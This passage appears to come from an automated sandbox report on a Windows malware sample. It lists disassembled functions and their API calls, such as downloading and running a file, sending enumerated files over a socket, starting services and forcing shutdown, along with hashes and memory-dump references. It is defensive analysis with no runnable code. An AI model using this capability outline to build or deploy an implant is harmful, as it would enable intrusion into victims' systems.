                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000310,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(00000310,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                            • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                            • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                            • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                          • String ID:
                                                          • API String ID: 4043647387-0
                                                          • Opcode ID: e8707b4ec4f65b3daa3568d955911baa256536beff12142bcc10b341d26decda
                                                          • Instruction ID: d6647de2ed81915fd1100427b9b1f0ab8477674b12134c2b00fdd843198b9521
                                                          • Opcode Fuzzy Hash: e8707b4ec4f65b3daa3568d955911baa256536beff12142bcc10b341d26decda
                                                          • Instruction Fuzzy Hash: 0DA16E719001089BCB14EBA1DD92AEDB779AF54318F10427FF506B71D2EF385E498B98
                                                          Function 00419DBA Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,00419A10,00000000,00000000), ref: 00419DC3
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00419A10,00000000,00000000), ref: 00419DD8
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419DE5
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00419A10,00000000,00000000), ref: 00419DF0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419E02
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,00419A10,00000000,00000000), ref: 00419E05
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          • Opcode ID: cfc7b607e36d21359a02d5afcedae3f84f405620953c8a7715537af6fd2295c5
                                                          • Instruction ID: bfab90d9ddd5c2d56401b7e15998ac1c6a079cb4321381bf248b2ffa9e014974
                                                          • Opcode Fuzzy Hash: cfc7b607e36d21359a02d5afcedae3f84f405620953c8a7715537af6fd2295c5
                                                          • Instruction Fuzzy Hash: 60F0E9715403146FD2115B31EC88DBF2A6CDF85BB2B01002EF442A3191CF78CD4995B5
                                                          Function 00450C8F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443F03,?,?,?,?,?,?,00000004), ref: 00450D71
                                                          • _wcschr.LIBVCRUNTIME ref: 00450E01
                                                          • _wcschr.LIBVCRUNTIME ref: 00450E0F
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443F03,00000000,00444023), ref: 00450EB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                          • String ID: (E
                                                          • API String ID: 4212172061-542121585
                                                          • Opcode ID: 59e7985f3c02f7c10489d8edf0480172058bbcb387fbadea5ac0dcfc1ce8ddaa
                                                          • Instruction ID: 16e6850baad922d2e300dda2121b2fdf61a8ef58a3873fa5b3432b878cecddba
                                                          • Opcode Fuzzy Hash: 59e7985f3c02f7c10489d8edf0480172058bbcb387fbadea5ac0dcfc1ce8ddaa
                                                          • Instruction Fuzzy Hash: A361FC7A500306AAD725AB75CC42ABB73A8EF44316F14082FFD05D7243EB78E949C769
                                                          Function 00415A51 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00416C9D: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416CAA
                                                            • Part of subcall function 00416C9D: OpenProcessToken.ADVAPI32(00000000), ref: 00416CB1
                                                            • Part of subcall function 00416C9D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416CC3
                                                            • Part of subcall function 00416C9D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416CE2
                                                            • Part of subcall function 00416C9D: GetLastError.KERNEL32 ref: 00416CE8
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00415AF3
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415B08
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00415B0F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-1420736420
                                                          • Opcode ID: e283aed8030f222677e32f677a5842ddb3918d5861ff5db7f0a7df2b8037313d
                                                          • Instruction ID: be3657bdb4b9c596b700244bf1edaf45c421fe256a6f88bebcc25452880e9c8a
                                                          • Opcode Fuzzy Hash: e283aed8030f222677e32f677a5842ddb3918d5861ff5db7f0a7df2b8037313d
                                                          • Instruction Fuzzy Hash: 84215E71644741A6CB14FBB198A6AFF22599F80748F40483FB442771D2EF7CE889865E
                                                          Function 004513F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451712,?,00000000), ref: 0045148C
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451712,?,00000000), ref: 004514B5
                                                          • GetACP.KERNEL32(?,?,00451712,?,00000000), ref: 004514CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          • API String ID: 2299586839-711371036
                                                          • Opcode ID: 7de529321666405c3dbd177549b20e94864b34fdb637d578d31b634f87125a95
                                                          • Instruction ID: 27270ea0035267e4249f05f4639a08e7e92d7e6a6a5113c6df6fa5280cb26525
                                                          • Opcode Fuzzy Hash: 7de529321666405c3dbd177549b20e94864b34fdb637d578d31b634f87125a95
                                                          • Instruction Fuzzy Hash: 0821C731600100B7DB308F54C901FA773A6AF52B67F5A9566EC0AD7223EB3ADD49C399
                                                          Function 0041A84A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A85B
                                                          • LoadResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A86F
                                                          • LockResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A876
                                                          • SizeofResource.KERNEL32(00000000,?,?,0040E25B,00000000), ref: 0041A885
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: af91fd7a50235684c3f0857021386823e2c7131a01440ecb0520647964aa65c6
                                                          • Instruction ID: 1fe06f9b0c9a023904624b9b61caa7bd4c13f92b8b5c35c0d543cfa28092256f
                                                          • Opcode Fuzzy Hash: af91fd7a50235684c3f0857021386823e2c7131a01440ecb0520647964aa65c6
                                                          • Instruction Fuzzy Hash: DAE01A76240720ABCB211BA1BD4CD073E39F7867637000039F549A2221CE75CC52CB29
                                                          Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00407A91
                                                          • FindFirstFileW.KERNEL32(00000000,?,00466AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: 44beeb7efd5a27b9ae6b5ed8b1b3fbc2cf3811c381e0606dcb53b55a88831ffb
                                                          • Instruction ID: e1cc7e471fba1e38487cd482a49156f4879f85d64aa43a49cb1f79655cfb0c65
                                                          • Opcode Fuzzy Hash: 44beeb7efd5a27b9ae6b5ed8b1b3fbc2cf3811c381e0606dcb53b55a88831ffb
                                                          • Instruction Fuzzy Hash: 325162729001085ACB14FBA5DD969ED7B78AF50318F50417FB806B31D2EF3CAB498B99
                                                          Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                          Strings
                                                          • open, xrefs: 0040622E
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 0040627F, 004063A7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadExecuteFileShell
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$open
                                                          • API String ID: 2825088817-1241815004
                                                          • Opcode ID: ad4cd8f0b1742ba2f271eadf04a78ea359f7dd7c98a1af5993a1802d316398a1
                                                          • Instruction ID: e32f65eb076a11421f0b28df520d432f118a03887cfea0ef8c7e4d0a3f62d172
                                                          • Opcode Fuzzy Hash: ad4cd8f0b1742ba2f271eadf04a78ea359f7dd7c98a1af5993a1802d316398a1
                                                          • Instruction Fuzzy Hash: E361CF3160430067CA14FA76D8569BE37A59F81718F01493FBC46772E6EF3CAA05C69B
                                                          Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstNextsend
                                                          • String ID: pPG$pPG
                                                          • API String ID: 4113138495-3204143781
                                                          • Opcode ID: 04cbaa432c918a42c53807cd0f2a3c10c6dd4e32f952d56d9836a960f393f504
                                                          • Instruction ID: b94dab712156e78be0f8cc3bef15d45c6a114b58aade1ae888b20ae253cfdc5a
                                                          • Opcode Fuzzy Hash: 04cbaa432c918a42c53807cd0f2a3c10c6dd4e32f952d56d9836a960f393f504
                                                          • Instruction Fuzzy Hash: F42187715043015BC714FB61DC95DEF77A8AF90318F40093EF996A31E1EF38AA08CA9A
                                                          Function 0041BD82 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BE77
                                                            • Part of subcall function 004127AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004127B9
                                                            • Part of subcall function 004127AA: RegSetValueExA.KERNEL32(?,XwF,00000000,?,00000000,00000000,00475308,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127E1
                                                            • Part of subcall function 004127AA: RegCloseKey.KERNEL32(?,?,?,0040E6D3,00467758,6.0.0 Pro), ref: 004127EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: 6c22d536f9cf41db2e3193d33a149bd53ec698417932bdd12186eb798744da75
                                                          • Instruction ID: 3b74369dcb7a8544f1b55df16a592c3d868ba554001bd6a4c71ed5c97b6fc17b
                                                          • Opcode Fuzzy Hash: 6c22d536f9cf41db2e3193d33a149bd53ec698417932bdd12186eb798744da75
                                                          • Instruction Fuzzy Hash: F5112132B8035033D518313A5E67BBF2816D34AB60F55415FB6066A6CAFADE4AA103DF
                                                          Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408DAC
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 301083792-0
                                                          • Opcode ID: 51940071d9f0d9280fa3336faee050b72c9abacde1575dd18f02a12ebdfc1b05
                                                          • Instruction ID: 402ed7a5658d2f2a6adb961a0daa6f616ba37c5e7974c2bf040f6c8ce137202a
                                                          • Opcode Fuzzy Hash: 51940071d9f0d9280fa3336faee050b72c9abacde1575dd18f02a12ebdfc1b05
                                                          • Instruction Fuzzy Hash: 127141728001199BCB15EBA1DC919EE7778AF54314F10427FE846B71E2EF385E49CB98
                                                          Function 0045107A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004510CE
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111F
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004511DF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                          • String ID:
                                                          • API String ID: 2829624132-0
                                                          • Opcode ID: dd837d4aabf90151236531eaa8a7eeaa8db7e820d6096a7a5c305d7033fab590
                                                          • Instruction ID: aee342ac21436657f5846041838c3bd09d84a4d920a4c2a145562aed062da8a9
                                                          • Opcode Fuzzy Hash: dd837d4aabf90151236531eaa8a7eeaa8db7e820d6096a7a5c305d7033fab590
                                                          • Instruction Fuzzy Hash: F661D8719005079BDB289F25CC82B7677A8EF04306F1041BBFD05D66A2EB78D949DB58
                                                          Function 0043A86D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A965
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A96F
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A97C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: af6e046c0509c32b3386d0bc76265e00dd1467fe013a3816057f721e951f2d82
                                                          • Instruction ID: 2e36d9e0b5662236be867d7d52d6a22dc3a0b47d07fc7de068387a758ceea7c7
                                                          • Opcode Fuzzy Hash: af6e046c0509c32b3386d0bc76265e00dd1467fe013a3816057f721e951f2d82
                                                          • Instruction Fuzzy Hash: E731D6B491131CABCB21DF24D98978DB7B8BF08311F5051EAE80CA7251EB749F818F49
                                                          Function 00442764 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 00442785
                                                          • TerminateProcess.KERNEL32(00000000,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 0044278C
                                                          • ExitProcess.KERNEL32 ref: 0044279E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
